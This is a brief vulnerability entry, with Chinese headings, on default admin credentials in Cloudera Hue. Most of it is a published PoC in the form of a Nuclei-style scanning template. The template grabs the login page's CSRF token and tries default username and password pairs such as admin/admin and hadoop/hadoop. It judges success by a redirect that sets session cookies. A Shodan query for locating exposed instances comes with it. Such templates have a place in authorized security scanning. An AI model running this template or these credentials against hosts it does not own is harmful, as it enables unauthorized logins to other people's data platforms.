漏洞描述
Cloudera Hue default admin credentials were discovered.
SHODAN: title:"Hue - Welcome to Hue"
hue-default-credential: Cloudera Hue Default Admin Login
PoC代码[已公开]
id: hue-default-credential
info:
name: Cloudera Hue Default Admin Login
author: For3stCo1d
severity: high
description: Cloudera Hue default admin credentials were discovered.
reference:
- https://github.com/cloudera/hue
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:cloudera:hue:*:*:*:*:*:*:*:*
metadata:
max-request: 8
shodan-query: title:"Hue - Welcome to Hue"
product: hue
vendor: cloudera
tags: hue,default-login,oss,cloudera,vuln
http:
- raw:
- |
GET /hue/accounts/login?next=/ HTTP/1.1
Host: {{Hostname}}
- |
POST /hue/accounts/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username={{user}}&password={{pass}}&next=%2F
attack: pitchfork
payloads:
user:
- admin
- hue
- hadoop
- cloudera
pass:
- admin
- hue
- hadoop
- cloudera
extractors:
- type: regex
name: csrfmiddlewaretoken
part: body
internal: true
group: 1
regex:
- name='csrfmiddlewaretoken' value='(.+?)'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(tolower(body_1), 'welcome to hue')
- contains(tolower(header_2), 'csrftoken=')
- contains(tolower(header_2), 'sessionid=')
condition: and
- type: status
status:
- 302
# digest: 490a004630440220259450e8943d7245697fb59b7a800e9e42451a5da9f6e0609bb1d84200733f9b02202e87b43d12cc3fdcdb6b082124bf9f71f84a9263b8cfb1f8b949fb0738678004:922c64590222798bb761d5b6d8e72950